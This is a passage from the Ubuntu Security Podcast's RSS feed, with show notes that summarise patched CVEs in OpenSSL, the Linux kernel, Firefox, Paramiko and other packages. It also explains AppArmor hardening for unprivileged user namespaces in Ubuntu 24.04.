<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-5341">CVE-2023-5341</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>ImageMagick is in universe, so these updates are available via <a href="https://ubuntu.com/pro">Ubuntu Pro</a></li>
<li>Heap UAF in BMP decoder - likely DoS but possible code-execution via a
crafted BMP file</li>
</ul>
<h3 id="usn-6622-1-openssl-vulnerabilities--08-07">[<a href="https://ubuntu.com/security/notices/USN-6622-1">USN-6622-1</a>] OpenSSL vulnerabilities (08:07)</h3>
<ul>
<li>4 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-0727">CVE-2024-0727</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6237">CVE-2023-6237</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6129">CVE-2023-6129</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-5678">CVE-2023-5678</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Two CPU-based DoS issues where OpenSSL would spend an excessive amount of
time trying to check an invalid RSA or X9.42 DH keys</li>
<li>NULL ptr deref when parsing a malicious PKCS12 file</li>
<li>Issue specific to PowerPC (ppc64el arch in Ubuntu) - possible to corrupt
application state since the POLY1305 MAC implementation (hand-coded assembly)
saves the contents of the vector registers in a different order than when they
get restored - so some registers will be corrupted when returning to the
caller
<ul>
<li>Only relevant on newer PowerPC processors which support the PowerISA 2.07
instructions</li>
</ul>
</li>
</ul>
<h3 id="usn-6592-2-libssh-vulnerabilities--09-27">[<a href="https://ubuntu.com/security/notices/USN-6592-2">USN-6592-2</a>] libssh vulnerabilities (09:27)</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-6918">CVE-2023-6918</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6004">CVE-2023-6004</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Recent libssh update now also available for Ubuntu Pro users on older releases</li>
</ul>
<h3 id="usn-6623-1-django-vulnerability--09-34">[<a href="https://ubuntu.com/security/notices/USN-6623-1">USN-6623-1</a>] Django vulnerability (09:34)</h3>
<ul>
<li>1 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-24680">CVE-2024-24680</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>ReDoS when using the <code>intcomma</code> template</li>
</ul>
<h3 id="usn-6609-3-linux-kernel--oracle--vulnerabilities--09-45">[<a href="https://ubuntu.com/security/notices/USN-6609-3">USN-6609-3</a>] Linux kernel (Oracle) vulnerabilities (09:45)</h3>
<ul>
<li>6 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-0193">CVE-2024-0193</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6932">CVE-2023-6932</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6931">CVE-2023-6931</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6817">CVE-2023-6817</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6606">CVE-2023-6606</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6040">CVE-2023-6040</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Refer back to <a href="https://ubuntusecuritypodcast.org/episode-217/">Episode 217</a> for most recent kernel vulns</li>
</ul>
<h3 id="usn-6610-2-firefox-regressions--09-57">[<a href="https://ubuntu.com/security/notices/USN-6610-2">USN-6610-2</a>] Firefox regressions (09:57)</h3>
<ul>
<li>14 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-0746">CVE-2024-0746</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0755">CVE-2024-0755</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0754">CVE-2024-0754</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0753">CVE-2024-0753</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0751">CVE-2024-0751</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0750">CVE-2024-0750</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0749">CVE-2024-0749</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0748">CVE-2024-0748</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0747">CVE-2024-0747</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0745">CVE-2024-0745</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0744">CVE-2024-0744</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0743">CVE-2024-0743</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0742">CVE-2024-0742</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0741">CVE-2024-0741</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Similarly, last week I mentioned <a href="/episode-217/#usn-6610-1-firefox-vulnerabilities">[USN-6610-1] Firefox vulnerabilities</a> -
upstream 122.0 release has various minor regressions now fixed in this 122.0.1
release - including an issue if you happened to be using the Yaru-Remix theme
in Ubuntu</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="updates-for-unprivileged-user-namespace-restrictions-in-ubuntu-24-dot-04-lts--10-32">Updates for unprivileged user namespace restrictions in Ubuntu 24.04 LTS (10:32)</h3>
<ul>
<li>Previously mentioned this work a few times on the podcast (<a href="/episode-211/#call-for-testing-of-unprivileged-user-namespace-restrictions-on-mantic">Call for testing of Unprivileged User Namespace Restrictions on Mantic in Episode 211</a> and <a href="/episode-205/#unprivileged-user-namespace-restrictions-via-apparmor-in-ubuntu--17-00">Unprivileged user namespace restrictions via AppArmor in Ubuntu in Episode 205</a>)</li>
<li>Both those times was about user namespace restrictions in Ubuntu 23.10 (the current interim release)</li>
<li>For those not familiar - user namespaces provide a mechanism for operating as
a different UID on a Linux system - in particular, can operate as uid 0 within
a namespace which is then constrained by the original parent namespace -
ie. as a normal unprivileged user, I could create a new user namespace and map
my UID to 0 within that namespace, which can then allow me to have say
<code>CAP_NET_ADMIN</code> within that namespace and so create firewall rules etc that only
affect applications within that namespace and not the host system
<ul>
<li>Can also be used for isolation etc</li>
<li>However, since within the namespace my unprivieleged user now has extra
privileges, exposes additional kernel attack surface - various bugs have
been found in differetn kernel subsystems that allow an unprivileged user to
exploit the kernel as a result</li>
</ul>
</li>
<li>Want a way to provide fine grained controls over unprivileged user namespaces</li>
<li>Previously, used AppArmor to deny the ability to create a new user namespace
unless an application was explicitly tagged via an associated AppArmor profile</li>
<li>John and Georgia from the AppArmor team have made a number of enhancements, in
particular adding a new default functionality where you can define in AppArmor
policy a different AppArmor profile which an application should transition
into when it creates a user namespace</li>
<li>In particular, we can now do this even for the &ldquo;unconfined&rdquo; profile - and then
ship a default &ldquo;unconfined_userns&rdquo; profile which allows an application to
create a userns but to not gain any additional capabilities within that by
default</li>
<li>Various sandboxing frameworks behave much more sensibly with this - so instead
of just failing when they try and create the userns, they instead are able to
create one but then if they try and gain additional capabilities (like
<code>CAP_NET_ADMIN</code> etc as mentioned before) this is then denied</li>
<li>This also matches the semantics which we want to achieve since it is not
really the user namespace itself that is the original issue, it is the ability
to gain additional capabilities within that which the unprivileged user did
not have originally</li>
<li>In addition, Georgia has been busy testing various applications within the
archive and across the Linux ecosystem to ensure we ship any required profiles
for them out-of-the-box so as many pieces of software continue to work as
expected with these restrictions in place</li>
<li>AppArmor in noble is already enabling this restriction and these updates are
now in the <code>apparmor</code> package in noble-proposed pocket
<ul>
<li>Expect to be available in noble within the next few days once automated
testing completes</li>
</ul>
</li>
<li>Requires some additional kernel support - Kernel Team has merged this into
their current <a href="https://launchpad.net/~canonical-kernel-team/+archive/ubuntu/unstable">linux-unstable kernel</a> (available via the Kernel Team&rsquo;s unstable
PPA) which will land eventually land in 24.04 proper</li>
<li>On track to have this additional security hardening feature enabled by default
for 24.04 LTS at release so we can close off one of the more prevalent sources
of kernel privilege escalation bugs in the past few years</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a>, <a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E218.mp3" length="18869433" type="audio/mpeg" /><itunes:duration>1088</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 217
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-217/</link>
          <pubDate>Fri, 02 Feb 2024 19:23:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>56d36447aec636e059c32ae020f68d2e342acbf89085e34d02f4d09443e16a2945e20812f5bbb3aab5a6b8e636e0da5f19b9a1e7babeaac4a4d0bff4d46f923a</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 217</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          For the first episode of 2024 we take a look at the case of a raft of bogus FOSS
  CVEs reported on full-disclosure as well as AppSec tools in Ubuntu and the EOL
  announcement for 23.04, plus we cover vulnerabilities in the Linux kernel,...
        
        ]]></itunes:subtitle>
        <itunes:summary>  For the first episode of 2024 we take a look at the case of a raft of bogus FOSS
  CVEs reported on full-disclosure as well as AppSec tools in Ubuntu and the EOL
  announcement for 23.04, plus we cover vulnerabilities in the Linux kernel, Puma,
  Paramiko and more.
  </itunes:summary>
        <description>  For the first episode of 2024 we take a look at the case of a raft of bogus FOSS
  CVEs reported on full-disclosure as well as AppSec tools in Ubuntu and the EOL
  announcement for 23.04, plus we cover vulnerabilities in the Linux kernel, Puma,
  Paramiko and more.
  </description>
        <googleplay:description>  For the first episode of 2024 we take a look at the case of a raft of bogus FOSS
  CVEs reported on full-disclosure as well as AppSec tools in Ubuntu and the EOL
  announcement for 23.04, plus we cover vulnerabilities in the Linux kernel, Puma,
  Paramiko and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>For the first episode of 2024 we take a look at the case of a raft of bogus FOSS
CVEs reported on full-disclosure as well as AppSec tools in Ubuntu and the EOL
announcement for 23.04, plus we cover vulnerabilities in the Linux kernel, Puma,
Paramiko and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>81 unique CVEs addressed</p>
<h3 id="usn-6601-1-linux-kernel-vulnerability--01-16">[<a href="https://ubuntu.com/security/notices/USN-6601-1">USN-6601-1</a>] Linux kernel vulnerability (01:16)</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-6932">CVE-2023-6932</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>UAF in IGMP protocol (allows multiple devices to share the same IPv4 address
and hence all receive the same data via multicasting - often used for things
like video streaming) - race condition between two different threads in the
handling of a timer which could cause the timer to be registered on an object
that is then later freed by another thread - when the timer then fires the
thread will try and access the object which has now been freed</li>
<li>Can be exploited by an unprivileged local user in a user namespace</li>
</ul>
<h3 id="usn-6602-1-linux-kernel-vulnerabilities--02-23">[<a href="https://ubuntu.com/security/notices/USN-6602-1">USN-6602-1</a>] Linux kernel vulnerabilities (02:23)</h3>
<ul>
<li>5 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-6932">CVE-2023-6932</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6931">CVE-2023-6931</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6606">CVE-2023-6606</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-45863">CVE-2023-45863</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-20588">CVE-2023-20588</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>IGMP UAF</li>
<li>OOB write in perf - didn&rsquo;t properly check the size of all events when
processing them - direct memory corruption able to be triggered by a local
user - and on older kernels like the 4.4 kernel shipped in Ubuntu 16.04 this
can be done from userspace directly</li>
<li>Divide-by-zero error on some AMD processors could return speculative data -&gt;
info leak (<a href="/episode-210/#usn-6383-1-linux-kernel-vulnerabilities--11-15">[USN-6383-1] Linux kernel vulnerabilities from Episode 210</a>)</li>
</ul>
<h3 id="usn-6603-1-linux-kernel--aws--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6603-1">USN-6603-1</a>] Linux kernel (AWS) vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-6932">CVE-2023-6932</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6931">CVE-2023-6931</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6606">CVE-2023-6606</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6604-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6604-1">USN-6604-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>6 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-6932">CVE-2023-6932</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6931">CVE-2023-6931</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6606">CVE-2023-6606</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-45863">CVE-2023-45863</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-20588">CVE-2023-20588</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1079">CVE-2023-1079</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6604-2-linux-kernel--azure--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6604-2">USN-6604-2</a>] Linux kernel (Azure) vulnerabilities</h3>
<ul>
<li>6 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-6932">CVE-2023-6932</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6931">CVE-2023-6931</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6606">CVE-2023-6606</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-45863">CVE-2023-45863</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-20588">CVE-2023-20588</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1079">CVE-2023-1079</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6605-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6605-1">USN-6605-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-6932">CVE-2023-6932</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6931">CVE-2023-6931</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6606">CVE-2023-6606</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6040">CVE-2023-6040</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6605-2-linux-kernel--kvm--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6605-2">USN-6605-2</a>] Linux kernel (KVM) vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-6932">CVE-2023-6932</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6931">CVE-2023-6931</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6606">CVE-2023-6606</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6040">CVE-2023-6040</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6606-1-linux-kernel--oem--vulnerabilities--03-04">[<a href="https://ubuntu.com/security/notices/USN-6606-1">USN-6606-1</a>] Linux kernel (OEM) vulnerabilities (03:04)</h3>
<ul>
<li>5 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-0193">CVE-2024-0193</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6931">CVE-2023-6931</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6817">CVE-2023-6817</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6606">CVE-2023-6606</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-51779">CVE-2023-51779</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>perf OOB write</li>
<li>2 very similar UAFs in netfilter - both require <code>CAP_NET_ADMIN</code> to be able to
exploit (ie to create a netfilter chain etc) but this can easily be obtained
in an unprivileged user namespace -&gt; privesc for unprivileged local user</li>
</ul>
<h3 id="usn-6608-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6608-1">USN-6608-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>5 CVEs addressed in Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-0193">CVE-2024-0193</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6932">CVE-2023-6932</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6931">CVE-2023-6931</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6817">CVE-2023-6817</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6606">CVE-2023-6606</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6609-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6609-1">USN-6609-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>6 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-0193">CVE-2024-0193</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6932">CVE-2023-6932</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6931">CVE-2023-6931</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6817">CVE-2023-6817</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6606">CVE-2023-6606</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6040">CVE-2023-6040</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6609-2-linux-kernel--nvidia--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6609-2">USN-6609-2</a>] Linux kernel (NVIDIA) vulnerabilities</h3>
<ul>
<li>6 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-0193">CVE-2024-0193</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6932">CVE-2023-6932</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6931">CVE-2023-6931</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6817">CVE-2023-6817</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6606">CVE-2023-6606</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6040">CVE-2023-6040</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6607-1-linux-kernel--azure--vulnerabilities--03-32">[<a href="https://ubuntu.com/security/notices/USN-6607-1">USN-6607-1</a>] Linux kernel (Azure) vulnerabilities (03:32)</h3>
<ul>
<li>7 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-0193">CVE-2024-0193</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6932">CVE-2023-6932</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6931">CVE-2023-6931</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6817">CVE-2023-6817</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6606">CVE-2023-6606</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6040">CVE-2023-6040</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-5345">CVE-2023-5345</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 netfilter UAFs, IGMP UAF, perf OOB write</li>
<li>UAF in SMB client implementation - local crash / privesc</li>
</ul>
<h3 id="usn-6596-1-apache-session-ldap-vulnerability--03-45">[<a href="https://ubuntu.com/security/notices/USN-6596-1">USN-6596-1</a>] Apache::Session::LDAP vulnerability (03:45)</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-36658">CVE-2020-36658</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Would not check the validity of an X.509 certificate since uses the Net::LDAPS
Perl module which by default doesn&rsquo;t do this and requires applications to
explicitly instruct it to do so</li>
</ul>
<h3 id="usn-6597-1-puma-vulnerability--04-24">[<a href="https://ubuntu.com/security/notices/USN-6597-1">USN-6597-1</a>] Puma vulnerability (04:24)</h3>
<ul>
<li>1 CVEs addressed in Lunar (23.04), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-21647">CVE-2024-21647</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>HTTP server for Ruby/Rack applications that uses threading for improved performance</li>
<li>Vulnerable to a HTTP request smuggling attack since it would fail to properly
parse packets with chunked transfer encoding</li>
<li>Also failed to set a limit on the size of chunk extensions which could then
allow a CPU or network-bandwidth based DoS attack</li>
</ul>
<h3 id="usn-6598-1-paramiko-vulnerability--04-58">[<a href="https://ubuntu.com/security/notices/USN-6598-1">USN-6598-1</a>] Paramiko vulnerability (04:58)</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-48795">CVE-2023-48795</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Fix for <a href="https://terrapin-attack.com/">Terrapin attack</a> disclosed back in December - flaw in SSH protocol
itself which allows an attacker who can interpose on the connection to drop
the <code>EXT_INFO</code> message which is sent during the handshake to negotiate various
protocol extensions in a way that neither the client or server will notice
(since they can just send an empty ignored packet with the same sequence
number).  This can be done quite easily by an attacker since during this stage
of the connection there is no encryption in place. End result is the attacker
can cause either a loss of integrity (since this won&rsquo;t be detected by the
other party) or potentially to compromise the key exchange itself and hence
cause a loss of confidentiality as well</li>
</ul>
<h3 id="usn-6599-1-jinja2-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6599-1">USN-6599-1</a>] Jinja2 vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-22195">CVE-2024-22195</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-28493">CVE-2020-28493</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6600-1-mariadb-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6600-1">USN-6600-1</a>] MariaDB vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-22084">CVE-2023-22084</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-47015">CVE-2022-47015</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6611-1-exim-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-6611-1">USN-6611-1</a>] Exim vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-51766">CVE-2023-51766</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6610-1-firefox-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6610-1">USN-6610-1</a>] Firefox vulnerabilities</h3>
<ul>
<li>14 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-0746">CVE-2024-0746</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0755">CVE-2024-0755</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0754">CVE-2024-0754</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0753">CVE-2024-0753</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0751">CVE-2024-0751</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0750">CVE-2024-0750</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0749">CVE-2024-0749</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0748">CVE-2024-0748</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0747">CVE-2024-0747</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0745">CVE-2024-0745</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0744">CVE-2024-0744</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0743">CVE-2024-0743</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0742">CVE-2024-0742</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0741">CVE-2024-0741</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6613-1-ceph-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-6613-1">USN-6613-1</a>] Ceph vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-43040">CVE-2023-43040</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6612-1-tinyxml-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-6612-1">USN-6612-1</a>] TinyXML vulnerability</h3>
<ul>
